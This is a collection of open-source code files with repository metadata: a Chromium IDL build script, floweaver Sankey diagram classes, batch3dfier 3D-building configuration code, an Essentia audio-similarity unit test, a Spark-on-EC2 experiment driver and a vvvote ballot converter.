context = {
'bind': blueprint.get('bind', '127.0.0.1')
}
uploads = blueprint.upload('redis', '/etc/redis/', context)
if uploads:
restart()
|
youtube/cobalt
|
third_party/blink/Source/bindings/scripts/compute_interfaces_info_individual.py
|
Python
|
bsd-3-clause
| 17,799
| 0.002472
|
#!/usr/bin/python
#
# Copyright (C) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Compute global interface information for individual IDL files.
Auxiliary module for compute_interfaces_info_overall, which consolidates
this individual information, computing info that spans multiple files
(dependencies and ancestry).
This distinction is so that individual interface info can be computed
separately for each component (avoiding duplicated reading of individual
files), then consolidated using *only* the info visible to a given component.
Design doc: http://www.chromium.org/developers/design-documents/idl-build
"""
from collections import defaultdict
import optparse
import os
import posixpath
import sys
from idl_compiler import idl_filename_to_interface_name
from idl_definitions import Visitor
from idl_reader import IdlReader
from utilities import idl_filename_to_component
from utilities import idl_filename_to_interface_name
from utilities import merge_dict_recursively
from utilities import read_idl_files_list_from_file
from utilities import shorten_union_name
from utilities import write_pickle_file
module_path = os.path.dirname(__file__)
source_path = os.path.normpath(os.path.join(module_path, os.pardir, os.pardir))
gen_path = os.path.join('gen', 'blink')
class IdlBadFilenameError(Exception):
"""Raised if an IDL filename disagrees with the interface name in the file."""
pass
def parse_options():
usage = 'Usage: %prog [options]'
parser = optparse.OptionParser(usage=usage)
parser.add_option('--cache-directory', help='cache directory')
parser.add_option('--idl-files-list', help='file listing IDL files')
parser.add_option('--dependency-idl-files', help='list of dependency IDL files')
parser.add_option('--interfaces-info-file', help='interface info pickle file')
parser.add_option('--component-info-file', help='component wide info pickle file')
parser.add_option('--root-directory', help='root directory for relative path computation', default=source_path)
parser.add_option('--extended-attributes', help='file containing whitelist of supported extended attributes')
options, args = parser.parse_args()
if options.interfaces_info_file is None:
parser.error('Must specify an output file using --interfaces-info-file.')
if options.idl_files_list is None:
parser.error('Must specify a file listing IDL files using --idl-files-list.')
return options, args
################################################################################
# Computations
################################################################################
def relative_dir_posix(idl_filename, base_path):
"""Returns relative path to the directo
|
ry of idl_file in POSIX format."""
relative_path_local = os.path.relpath(idl_filename, base_path)
relative_dir_local = os.path.dirname(relative_path_local)
return relative_dir_local.replace(os.path.sep, posixpath.sep)
def include_path(idl_filename, root_path, implemented_as=None):
"""Returns relative path to header file in POSIX format;
|
used in includes.
POSIX format is used for consistency of output, so reference tests are
platform-independent.
"""
relative_dir = relative_dir_posix(idl_filename, root_path)
# IDL file basename is used even if only a partial interface file
cpp_class_name = implemented_as or idl_filename_to_interface_name(idl_filename)
return posixpath.join(relative_dir, cpp_class_name + '.h')
def get_implements_from_definitions(definitions, definition_name):
left_interfaces = []
right_interfaces = []
for implement in definitions.implements:
if definition_name == implement.left_interface:
right_interfaces.append(implement.right_interface)
elif definition_name == implement.right_interface:
left_interfaces.append(implement.left_interface)
else:
raise IdlBadFilenameError(
'implements statement found in unrelated IDL file.\n'
'Statement is:\n'
' %s implements %s;\n'
'but filename is unrelated "%s.idl"' %
(implement.left_interface, implement.right_interface, definition_name))
return left_interfaces, right_interfaces
def get_put_forward_interfaces_from_definition(definition):
return sorted(set(attribute.idl_type.base_type
for attribute in definition.attributes
if 'PutForwards' in attribute.extended_attributes))
def get_unforgeable_attributes_from_definition(definition):
if 'Unforgeable' in definition.extended_attributes:
return sorted(definition.attributes)
return sorted(attribute for attribute in definition.attributes
if 'Unforgeable' in attribute.extended_attributes)
def collect_union_types_from_definitions(definitions):
"""Traverse definitions and collect all union types."""
class UnionTypeCollector(Visitor):
def collect(self, definitions):
self._union_types = set()
definitions.accept(self)
return self._union_types
def visit_typed_object(self, typed_object):
for attribute_name in typed_object.idl_type_attributes:
attribute = getattr(typed_object, attribute_name, None)
if not attribute:
continue
for idl_type in attribute.idl_types():
if idl_type.is_union_type:
self._union_types.add(idl_type)
return UnionTypeCollector().collect(definitions)
class InterfaceInfoCollector(object):
"""A class that collects interface information from idl files."""
def __init__(self, root_directory, extend_attributes_filename, cache_directory=None):
self.reader = IdlReader(interfaces_info=None, outputdir=cache_directory,
extend_attributes_filename=extend_attributes_filename)
self.interfaces_info = {}
self.partial_interface_files = defaultdict(lambda: {
'full_paths': [],
'include_paths': [],
})
self.enumerations = {}
self.union_types = set()
self.typedefs = {}
self.callback_functions = {}
self.root_path = root_directory
self.referenced_from_partial_interfaces = defaultdict(lambda: set())
def add_paths_to_partials_dict(self, partial_interface_name, full_path,
include_paths):
paths_dict = self.partial_interface_files[partial_interface_name]
paths_dict['full_paths'].append(full_path)
paths_dict['include_paths'].extend(include_paths)
def collect_info(s
|
ricklupton/sankeyview
|
floweaver/sankey_definition.py
|
Python
|
mit
| 9,779
| 0.001636
|
from textwrap import dedent
from pprint import pformat
from collections import OrderedDict
import attr
from . import sentinel
from .ordering import Ordering
# adapted from https://stackoverflow.com/a/47663099/1615465
def no_default_vals_in_repr(cls):
"""Class decorator on top of attr.s that omits attributes from repr that
have their default value"""
defaults = OrderedDict()
for attribute in cls.__attrs_attrs__:
if isinstance(attribute.default, attr.Factory):
assert attribute.default.takes_self == False, 'not implemented'
defaults[attribute.name] = attribute.default.factory()
else:
defaults[attribute.name] = attribute.default
def repr_(self):
real_cls = self.__class__
qualname = getattr(real_cls, "__qualname__", None)
if qualname is not None:
class_name = qualname.rsplit(">.", 1)[-1]
else:
class_name = real_cls.__name__
attributes = defaults.keys()
return "{0}({1})".format(
class_name,
", ".join(
name + "=" + repr(getattr(self, name))
for name in attributes
if getattr(self, name) != defaults[name]))
cls.__repr__ = repr_
return cls
# SankeyDefinition
def _convert_bundles_to_dict(bundles):
if not isinstance(bundles, dict):
bundles = {k: v for k, v in enumerate(bundles)}
return bundles
def _convert_ordering(ordering):
if isinstance(ordering, Ordering):
return ordering
else:
return Ordering(ordering)
def _validate_bundles(instance, attribute, bundles):
# Check bundles
for k, b in bundles.items():
if not b.from_elsewhere:
if b.source not in instance.nodes:
raise ValueError('Unknown source "{}" in bundle {}'.format(
b.source, k))
if not isinstance(instance.nodes[b.source], ProcessGroup):
raise ValueError(
'Source of bundle {} is not a process group'.format(k))
if not b.to_elsewhere:
if b.target not in instance.nodes:
raise ValueError('Unknown target "{}" in bundle {}'.format(
b.target, k))
if not isinstance(instance.nodes[b.target], ProcessGroup):
raise ValueError(
'Target of bundle {} is not a process group'.format(k))
for u in b.waypoints:
if u not in instance.
|
nodes:
raise ValueError('Unknown waypoint "{}" in bundle {}'.format(
u, k))
if not isinstance(instance.nodes[u], Waypoint):
raise ValueError(
'Waypoint "{}" of bundle {} is not a waypoint'.forma
|
t(u,
k))
def _validate_ordering(instance, attribute, ordering):
for layer_bands in ordering.layers:
for band_nodes in layer_bands:
for u in band_nodes:
if u not in instance.nodes:
raise ValueError('Unknown node "{}" in ordering'.format(u))
@attr.s(slots=True, frozen=True)
class SankeyDefinition(object):
nodes = attr.ib()
bundles = attr.ib(converter=_convert_bundles_to_dict,
validator=_validate_bundles)
ordering = attr.ib(converter=_convert_ordering, validator=_validate_ordering)
flow_selection = attr.ib(default=None)
flow_partition = attr.ib(default=None)
time_partition = attr.ib(default=None)
def copy(self):
return self.__class__(self.nodes.copy(), self.bundles.copy(),
self.ordering, self.flow_partition,
self.flow_selection, self.time_partition)
def to_code(self):
nodes = "\n".join(
" %s: %s," % (repr(k), pformat(v)) for k, v in self.nodes.items()
)
ordering = "\n".join(
" %s," % repr([list(x) for x in layer]) for layer in self.ordering.layers
# convert to list just because it looks neater
)
bundles = "\n".join(
" %s," % pformat(bundle) for bundle in self.bundles.values()
)
if self.flow_selection is not None:
flow_selection = "flow_selection = %s\n\n" % pformat(self.flow_selection)
else:
flow_selection = ""
if self.flow_partition is not None:
flow_partition = "flow_partition = %s\n\n" % pformat(self.flow_partition)
else:
flow_partition = ""
if self.time_partition is not None:
time_partition = "time_partition = %s\n\n" % pformat(self.time_partition)
else:
time_partition = ""
code = dedent("""
from floweaver import (
ProcessGroup,
Waypoint,
Partition,
Group,
Elsewhere,
Bundle,
SankeyDefinition,
)
nodes = {
%s
}
ordering = [
%s
]
bundles = [
%s
]
%s%s%ssdd = SankeyDefinition(nodes, bundles, ordering%s%s%s)
""") % (
nodes,
ordering,
bundles,
flow_selection,
flow_partition,
time_partition,
(", flow_selection=flow_selection" if flow_selection else ""),
(", flow_partition=flow_partition" if flow_partition else ""),
(", time_partition=time_parititon" if time_partition else "")
)
return code
# ProcessGroup
def _validate_direction(instance, attribute, value):
if value not in 'LR':
raise ValueError('direction must be L or R')
@no_default_vals_in_repr
@attr.s(slots=True)
class ProcessGroup(object):
"""A ProcessGroup represents a group of processes from the underlying dataset.
The processes to include are defined by the `selection`. By default they
are all lumped into one node in the diagram, but by defining a `partition`
this can be controlled.
Attributes
----------
selection : list or string
If a list of strings, they are taken as process ids.
If a single string, it is taken as a Pandas query string run against the
process table.
partition : Partition, optional
Defines how to split the ProcessGroup into subgroups.
direction : 'R' or 'L'
Direction of flow, default 'R' (left-to-right).
title : string, optional
Label for the ProcessGroup. If not set, the ProcessGroup id will be used.
"""
selection = attr.ib(default=None)
partition = attr.ib(default=None)
direction = attr.ib(validator=_validate_direction, default='R')
title = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(str)))
# Waypoint
@no_default_vals_in_repr
@attr.s(slots=True)
class Waypoint(object):
"""A Waypoint represents a control point along a :class:`Bundle` of flows.
There are two reasons to define Waypoints: to control the routing of
:class:`Bundle` s of flows through the diagram, and to split flows according
to some attributes by setting a `partition`.
Attributes
----------
partition : Partition, optional
Defines how to split the Waypoint into subgroups.
direction : 'R' or 'L'
Direction of flow, default 'R' (left-to-right).
title : string, optional
Label for the Waypoint. If not set, the Waypoint id will be used.
"""
partition = attr.ib(default=None)
direction = attr.ib(validator=_validate_direction, default='R')
title = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(str)))
# Bundle
Elsewhere = sentinel.create('Elsewhere')
def _validate_flow_selection(instance, attribute, value):
if instance.source == instance.target and not value:
raise ValueError('flow_selection is required for bundle with same '
'source and target')
@no_default_vals_in_repr
@attr.s(frozen=True, slots=True)
class Bund
|
balazsdukai/batch3dfier
|
batch3dfier/config.py
|
Python
|
gpl-3.0
| 20,894
| 0.000814
|
# -*- coding: utf-8 -*-
"""Configure batch3dfier with the input data."""
import os.path
from subprocess import call
from shapely.geometry import shape
from shapely import geos
from psycopg2 import sql
import fiona
def call_3dfier(db, tile, schema_tiles,
pc_file_name, pc_tile_case, pc_dir,
table_index_pc, fields_index_pc,
table_index_footprint, fields_index_footprint, uniqueid,
extent_ewkb, clip_prefix, prefix_tile_footprint,
yml_dir, tile_out, output_format, output_dir,
path_3dfier, thread):
"""Call 3dfier with the YAML config created by yamlr().
Note
----
For the rest of the parameters see batch3dfier_config.yml.
Parameters
----------
db : db Class instance
tile : str
Name of of the 2D tile.
schema_tiles : str
Schema of the footprint tiles.
pc_file_name : str
Naming convention for the pointcloud files. See 'dataset_name' in batch3dfier_config.yml.
pc_tile_case : str
How the string matching is done for pc_file_name. See 'tile_case' in batch3dfier_config.yml.
pc_dir : str
Directory of the poi
|
ntcloud files. See 'dataset_dir' in batch3dfier_config.yml.
thread : str
Name/ID of the active thread.
extent_ewkb : str
EWKB representation of
|
'extent' in batch3dfier_config.yml.
clip_prefix : str
Prefix for naming the clipped/united views. This value shouldn't be a substring of the pointcloud file names.
prefix_tile_footprint : str or None
Prefix prepended to the footprint tile view names. If None, the views are named as
the values in fields_index_fooptrint['unit_name'].
Returns
-------
list
The tiles that are skipped because no corresponding pointcloud file
was found in 'dataset_dir' (YAML)
"""
pc_tiles = find_pc_tiles(db, table_index_pc, fields_index_pc,
table_index_footprint, fields_index_footprint,
extent_ewkb, tile_footprint=tile,
prefix_tile_footprint=prefix_tile_footprint)
pc_path = find_pc_files(pc_tiles, pc_dir, pc_file_name, pc_tile_case)
# prepare output file name
if not tile_out:
tile_out = tile.replace(clip_prefix, '', 1)
# Call 3dfier ------------------------------------------------------------
if pc_path:
# Needs a YAML per thread so one doesn't overwrite it while the other
# uses it
yml_name = thread + "_config.yml"
yml_path = os.path.join(yml_dir, yml_name)
config = yamlr(dbname=db.dbname, host=db.host, user=db.user,
pw=db.password, schema_tiles=schema_tiles,
bag_tile=tile, pc_path=pc_path,
output_format=output_format, uniqueid=uniqueid)
# Write temporary config file
try:
with open(yml_path, "w") as text_file:
text_file.write(config)
except BaseException:
print("Error: cannot write _config.yml")
# Prep output file name
if "obj" in output_format.lower():
o = tile_out + ".obj"
output_path = os.path.join(output_dir, o)
elif "csv" in output_format.lower():
o = tile_out + ".csv"
output_path = os.path.join(output_dir, o)
else:
output_path = os.path.join(output_dir, tile_out)
# Run 3dfier
command = (path_3dfier + " {yml} -o {out}").format(
yml=yml_path, out=output_path)
try:
call(command, shell=True)
except BaseException:
print("\nCannot run 3dfier on tile " + tile)
tile_skipped = tile
else:
print(
"\nPointcloud file(s) " +
str(pc_tiles) +
" not available. Skipping tile.\n")
tile_skipped = tile
return({'tile_skipped': tile_skipped,
'out_path': None})
return({'tile_skipped': None,
'out_path': output_path})
def yamlr(dbname, host, user, pw, schema_tiles,
bag_tile, pc_path, output_format, uniqueid):
"""Parse the YAML config file for 3dfier.
Parameters
----------
See batch3dfier_config.yml.
Returns
-------
string
the YAML config file for 3dfier
"""
pc_dataset = ""
if len(pc_path) > 1:
for p in pc_path:
pc_dataset += "- " + p + "\n" + " "
else:
pc_dataset += "- " + pc_path[0]
# !!! Do not correct the indentation of the config template, otherwise it
# results in 'YAML::TypedBadConversion<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > >'
# because every line is indented as here
config = """
input_polygons:
- datasets:
- "PG:dbname={dbname} host={host} user={user} password={pw} schemas={schema_tiles} tables={bag_tile}"
uniqueid: {uniqueid}
lifting: Building
lifting_options:
Building:
height_roof: percentile-90
height_floor: percentile-10
lod: 1
input_elevation:
- datasets:
{pc_path}
omit_LAS_classes:
thinning: 0
options:
building_radius_vertex_elevation: 2.0
radius_vertex_elevation: 1.0
threshold_jump_edges: 0.5
output:
format: {output_format}
building_floor: true
vertical_exaggeration: 0
""".format(dbname=dbname,
host=host,
user=user,
pw=pw,
schema_tiles=schema_tiles,
bag_tile=bag_tile,
uniqueid=uniqueid,
pc_path=pc_dataset,
output_format=output_format)
return(config)
def find_pc_files(pc_tiles, pc_dir, pc_file_name, pc_tile_case):
"""Find pointcloud files in the file system when given a list of pointcloud tile names
"""
# Prepare AHN file names -------------------------------------------------
if pc_tile_case == "upper":
tiles = [pc_file_name.format(tile=t.upper()) for t in pc_tiles]
elif pc_tile_case == "lower":
tiles = [pc_file_name.format(tile=t.lower()) for t in pc_tiles]
elif pc_tile_case == "mixed":
tiles = [pc_file_name.format(tile=t) for t in pc_tiles]
else:
raise "Please provide one of the allowed values for pc_tile_case."
# use the tile list in tiles to parse the pointcloud file names
pc_path = [os.path.join(pc_dir, pc_tile) for pc_tile in tiles]
if all([os.path.isfile(p) for p in pc_path]):
return(pc_path)
else:
return(None)
def find_pc_tiles(db, table_index_pc, fields_index_pc,
table_index_footprint=None, fields_index_footprint=None,
extent_ewkb=None, tile_footprint=None,
prefix_tile_footprint=None):
"""Find pointcloud tiles in tile index that intersect the extent or the footprint tile.
Parameters
----------
prefix_tile_footprint : str or None
Prefix prepended to the footprint tile view names. If None, the views are named as
the values in fields_index_fooptrint['unit_name'].
"""
if extent_ewkb:
tiles = get_2Dtiles(db, table_index_pc, fields_index_pc, extent_ewkb)
else:
schema_pc_q = sql.Identifier(table_index_pc['schema'])
table_pc_q = sql.Identifier(table_index_pc['table'])
field_pc_geom_q = sql.Identifier(fields_index_pc['geometry'])
field_pc_unit_q = sql.Identifier(fields_index_pc['unit_name'])
schema_ftpr_q = sql.Identifier(table_index_footprint['schema'])
table_ftpr_q = sql.Identifier(table_index_footprint['table'])
field_ftpr_geom_q = sql.Identifier(fields_index_footprint['geometry'])
field_ftpr_unit_q = sql.Identifier(fields_index_footprint['unit_name'])
if prefix_tile_footprint:
tile_footprint = tile_footprint.replace(
prefix_tile_footprint, '', 1)
tile_q = sql.Literal(tile_footprint)
query = sql.SQL("""
SELECT
{table_pc}.{field_pc_unit}
|
MTG/essentia
|
test/src/unittests/highlevel/test_coversongsimilarity.py
|
Python
|
agpl-3.0
| 3,115
| 0.004815
|
#!/usr/bin/env python
# Copyright (C) 2006-2017 Music Technology Group - Universitat Pompeu Fabra
#
# This file is part of Essentia
#
# Essentia is free software: you can redistribute it and/or modify it under
# the terms of the GNU Affero General Public License as published by the Free
# Software Foundation (FSF), either version 3 of the License, or (at your
# option) any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the Affero GNU General Public License
# version 3 along with this program. If not, see http://www.gnu.org/licenses/
from essentia_test import *
class TestCoverSongSimilarity(TestCase):
'''Unit tests for essentia CoverSongSimilarity algorithm'''
# pre-defined binary similarity matrix for the test
sim_matrix = array([[1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 1, 1, 0, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1],
[1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0 ,0, 0, 0, 0, 0],
[0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1]])
# expected cover similarity distance
expected_distance = 1.732
def testEmpty(self):
self.assertComputeFails(CoverSongSimilarity(), [])
def testRegressionStandard(self):
'''Test regression of CoverSongSimilarity algorithm in standard mode'''
sim = CoverSongSimilarity()
score_matrix, distance = sim.compute(self.sim_matrix)
self.assertAlmostEqualFixedPrecision(self.expected_distance, distance)
warn = "Expected shape of output score_matrix is %s, instead of %s" % (self.sim_matrix.shape, score_matrix.shape)
self.assertEqual(score_matrix.shape[0], self.sim_matrix.shape[0], warn)
self.assertEqual(score_matrix.shape[1], self.sim_matrix.shape[1], warn)
def testInvalidParam(self):
self.assertConfigureFails(CoverSongSimilarity(), { 'distanceType': 'test' })
self.assertConfigureFails(CoverSongSimilarity(), { 'alignmentType': 'test' })
def testRegressionStreaming(self):
'''Test regression of CoverSongSimilarity algorithm in streaming mode'''
from essentia.streaming import CoverSongSimilarity as CoverSongSimilarityStreaming
matrix_input = VectorInput(self.sim_matrix)
coversim_streaming = CoverSongSimilarityStreaming(pipeDistance=True)
pool = Pool()
matrix_input.data >> coversim_streaming.inputArray
coversim_streaming.scoreMatrix >> (pool, 'scoreMatrix')
|
coversim_streaming.distance >> (pool, 'distance')
# run th
|
e algorithm network
run(matrix_input)
self.assertAlmostEqualFixedPrecision(self.expected_distance, pool['distance'][-1])
suite = allTests(TestCoverSongSimilarity)
if __name__ == '__main__':
TextTestRunner(verbosity=2).run(suite)
|
jtian0/project-platform
|
conduct.py
|
Python
|
mit
| 5,372
| 0.001303
|
#!/usr/bin/env python3
from thesis import Submit
import time
import logging
import signal
import threading
import boto.ec2
import multiprocessing as mp
import subprocess as sp
from pprint import pprint
from thesis import Propagator
from thesis import Pattern
from thesis import Parser
from thesis import Console
__author__ = 'Jiannan Tian'
# cmd
_start_all = "\'/root/spark/sbin/start-all.sh > /dev/null\'"
_stop_all = "\'/root/spark/sbin/stop-all.sh > /dev/null\'"
_pkill = "\'pkill -f spark\'"
# logging
logging.basicConfig(level=logging.INFO,
format=Console.color_text('[%(threadName)-10s][%(levelname)s]\t',
'%(message)s'))
def cluster_init(conn):
ins = [i for i in Console.instance_get_all(conn, instance_ids=None) if
i.state == u'running']
master = [i for i in ins if i.groups[0].name == 'spark-cluster-master']
enable_history = Propagator.ssh_cmd(master[0].public_dns_name,
'sh /root/project-platform/conf_init.sh')
sp.check_call(enable_history, shell=True)
def dispatcher_no_pattern(task_id, conn, opts, graph_gen=False,
data_exportable=False):
s = Submit.Submit(opts)
submit = mp.Process(name="submission-%s" % task_id, target=s.commit)
submit.start()
while submit.is_alive():
time.sleep(opts.interval)
logging.info("Submission is still in progress...")
# for termination
try:
time.sleep(0.1) # delay
except mp.ProcessError:
pass
# filename = 'ephemeral_files/graph_%s_%s.txt' % (task_id, p.timestamp)
def dispatcher(task_id, conn, opts, graph_gen=False, data_exportable=False):
"""
will be called its .join() to block thread in next iteration
process instead of thread for unconditional termination
"""
p = Pattern.AvailabilityPattern(task_id=str(task_id), amplitude=opts.amplitude,
mean=opts.mean, end=opts.end)
if graph_gen:
threading.Thread(name="graph_gen-%s" % task_id, target=p.graph).start()
propagator = Propagator.Propagator(conn, p)
propagator.executor_reset()
propagator.driver_initialize(opts)
propagator_run = mp.Process(name="pattern-{}".format(task_id), target=propagator.driver, args=(opts,))
propagator_run.start()
s = Submit(opts)
submit = mp.Process(name="submission-%s" % task_id, target=s.commit)
submit.start()
while submit.is_alive():
time.sleep(opts.interval)
logging.info("Submission is still in progress...")
# for termination
try:
propagator_run.terminate()
time.sleep(0.1) # delay
except mp.ProcessError:
pass
if propagator_run.exitcode == -signal.SIGTERM:
logging.info("Submission is shorter than given pattern time.")
filename = 'ephemeral_files/graph_%s_%s.txt' % (task_id, p.timestamp)
if data_exportable:
with open(filename, 'w') as f:
f.write('t_%s = ' % task_id + repr(p.t) + '\n')
f.write('y_%s = ' % task_id + repr(p.y) + '\n')
f.write('y_d_%s = ' % task_id + repr(p.y_d) + '\n')
while submit.is_alive():
time.sleep(5)
if submit.exitcode == 0:
f.write('time_%s = ' % task_id + repr(s.time_elapsed) + '\n')
f.close()
def dispatcher_wrapper(conn, task_id, opts, avai_pattern_enable=True):
logging.info('Timestamp: %s' % Pattern.timestamp)
logging.info('Starting submission #%s' % task_id)
start = time.time()
if avai_pattern_enable:
kwargs = {'task_id': task_id, '
|
conn': conn, 'opts': opts,
'graph_gen': True, 'data_exportable': True}
d = mp.Process(target=dispatcher, kwargs=kwargs)
else:
kwargs = {'task_id': task_id, 'conn': conn, 'opts': opts,
'graph_gen': True, 'data_exportable': True,
'no_avail_pattern': True}
d = mp.Process(target=dispatcher)
d.start()
d.join()
# dispatcher(task_id=task_id, conn=conn, opts=opts, graph_gen=True,
|
data_exportable=True)
elapsed = time.time() - start
logging.info('Submission #%s finished, p%s_i%s, taking %.6f seconds'
% (task_id, opts.partition, opts.iteration, elapsed))
def main():
conn = boto.ec2.connect_to_region("us-east-1")
opts, _action = Parser.experiment_parse_args()
try:
sp.check_call("rm -fr __pycache__ && rm *.pyc", shell=True)
except sp.CalledProcessError:
pass
cluster_init(conn)
if _action[0] == 'run':
for task_id in range(opts.reps):
dispatcher_wrapper(conn, task_id, opts)
if _action[0] == 'measure-checkpointing-time':
pass
if _action[0] in ('debug', 'd'):
pprint(opts.__dict__)
if _action[0] == 'diagnostic':
diagnostic = Propagator.Propagator(conn)
if _action[1] == 'reset':
diagnostic.executor_reset()
if _action[1] == 'start-all':
master_ip = diagnostic.master_ip
sp.check_call(Propagator.ssh_cmd(master_ip, _start_all), shell=True)
if _action[0] == 'stop-all':
master_ip = diagnostic.master_ip
sp.check_call(Propagator.ssh_cmd(master_ip, _stop_all), shell=True)
if __name__ == '__main__':
main()
|
nottimbergling/isREAL-ui
|
backend/entities/base_request.py
|
Python
|
mit
| 292
| 0.010274
|
class BaseRequest(ob
|
ject):
def __init__(self, raw_request_dict):
self.body = raw_request_dict
if not self.body:
self.body ={}
def validate_scheme(self, scheme):
scheme.vali
|
date(self.body)
def get_value(self,key):
return self.body[key]
|
Undeterminant/archlinux-metapkg
|
run_tests.py
|
Python
|
cc0-1.0
| 5,479
| 0.000183
|
from click.testing import CliRunner
from contextlib import contextmanager
from metapkg import main as metapkg_main
from unittest import TestCase, main
import os
import metapkg as mp
class TestBuilds(TestCase):
def setUp(self):
self.maxDiff = None
def assertValidPKGBUILD(self, directory):
meta = self.grab_file(directory + '/METABUILD')
if directory[-6:] == '_error':
err = self.grab_file(directory + '/error')
with self.assertRaises(mp.MetapkgError) as ex:
mp.quick_metapkg(meta)
self.assertEqual(str(ex.exception).rstrip(), err.rstrip())
else:
pkg = self.grab_file(directory + '/PKGBUILD')
self.assertEqual(mp.quick_metapkg(meta), pkg)
def grab_file(self, name):
try:
with open(name) as f:
return f.read()
except OSError:
return ''
class TestStrings(TestCase):
def setUp(self):
self.maxDiff = None
self.testStatement = mp.Statement()
self.testStatement.directive = 'desc'
self.testStatement.arch.append('x86_64')
self.testStatement.names.extend(('meta-first', 'meta-second'))
self.testStatement.data.extend(('base', 'base-devel'))
self.testPackage = mp.Package()
self.testPackage.desc = 'Description'
self.testPackage.ver = 1.0
self.testPackage.rel = 1
self.testPackage.deps = {'pacman'}
self.testPackage.optdeps = {'linux'}
self.testPackage.provides = {'meta-package'}
self.testPackage.arch = {'x86_64'}
def test_Statement_str(self):
self.assertEqual(str(self.testStatement), """\
.arch x86_64: .desc meta-first meta-second = base base-devel\
""")
def test_Statement_repr(self):
self.assertEqual(repr(self.testStatement), """Statement(\
arch = ['x86_64'], \
directive = 'desc', \
names = ['meta-first', 'meta-second'], \
data = ['base', 'base-devel']\
)""")
def test_Package_repr(self):
self.assertEqual(repr(self.testPackage), """Package(\
desc = 'Description', \
ver = 1.0, \
rel = 1, \
deps = {'pacman'}, \
optdeps = {'linux'}, \
provides = {'meta-package'}, \
arch = {'x86_64'})\
""")
class TestCLI(Test
|
Case):
def setUp(self):
self.maxDiff = None
@contextmanager
def runCLI(self, args=[], input=None, mb=None, pb=None):
runner = CliRunner()
with runner.isolated_filesystem():
if mb:
with open('METABUILD', 'w') as f:
print(mb, file=f)
i
|
f pb:
with open('PKGBUILD', 'w') as f:
print(pb, file=f)
yield runner.invoke(metapkg_main, args, input)
def assertGeneratedPKGBUILD(self, metabuild):
with open('PKGBUILD') as f:
self.assertEqual(f.read(), mp.quick_metapkg(metabuild))
def assertException(self, result, exc):
self.assertEqual(result.exception, exc)
self.assertNotEqual(result.exit_code, 0)
def assertNoException(self, result):
self.assertEqual(result.exception, None)
self.assertEqual(result.exit_code, 0)
def assertOutput(self, result, output):
self.assertEqual(result.output, output)
def test_empty_dir(self):
with self.runCLI() as result:
self.assertException(result, mp.METABUILDError())
def test_valid_metabuild(self):
with self.runCLI(mb='meta-package = pacman') as result:
self.assertGeneratedPKGBUILD('meta-package = pacman')
self.assertNoException(result)
def test_force_pkgbuild(self):
with self.runCLI(['-f'], mb='meta-package = pacman') as result:
self.assertGeneratedPKGBUILD('meta-package = pacman')
self.assertNoException(result)
def test_pkgbuild_exists(self):
with self.runCLI(mb='meta-package=pacman', pb='\n') as result:
self.assertException(result, mp.PKGBUILDError())
def test_stdout(self):
with self.runCLI(['-O'], mb='meta-package=pacman') as result:
self.assertOutput(result,
mp.quick_metapkg('meta-package = pacman'))
self.assertNoException(result)
def test_stdin(self):
with self.runCLI(['-I'], input='meta-package=pacman') as result:
self.assertGeneratedPKGBUILD('meta-package = pacman')
self.assertNoException(result)
def test_invalid_package_add(self):
with self.runCLI(mb='meta-package=totally-not-package') as result:
self.assertException(result, mp.InvalidPackageError(
'totally-not-package', 'meta-package'
))
def test_invalid_package_remove(self):
with self.runCLI(mb='meta-package = - linux') as result:
self.assertException(result, mp.InvalidPackageError(
'linux', 'meta-package', True
))
def test_syntax_error(self):
with self.runCLI(mb='meta-package =') as result:
self.assertException(
result,
mp.ParseError("last statement is incomplete on line 2, col 0")
)
mp._TESTING = True
for subdir in os.listdir('tests'):
def run_test(self, directory='tests/' + subdir):
self.assertValidPKGBUILD(directory)
run_test.__name__ = 'test_' + subdir
setattr(TestBuilds, run_test.__name__, run_test)
del run_test
if __name__ == '__main__':
main()
|
dpausp/arguments
|
src/ekklesia_portal/lib/vvvote/election_config.py
|
Python
|
agpl-3.0
| 2,273
| 0.00264
|
import datetime
from uuid import uuid4
import ekklesia_portal.li
|
b.vvvote.schema as vvvote_schema
def ballot_to_vvvote_question(ballot, question_id=1):
options = []
voting_scheme_yes_no = vvvote_schema.YesNoScheme(
name='yesNo', abstention=True, abstentionAsNo=False, quorum=2, mod
|
e=vvvote_schema.SchemeMode.QUORUM
)
voting_scheme_score = vvvote_schema.ScoreScheme(name='score', minScore=0, maxScore=3)
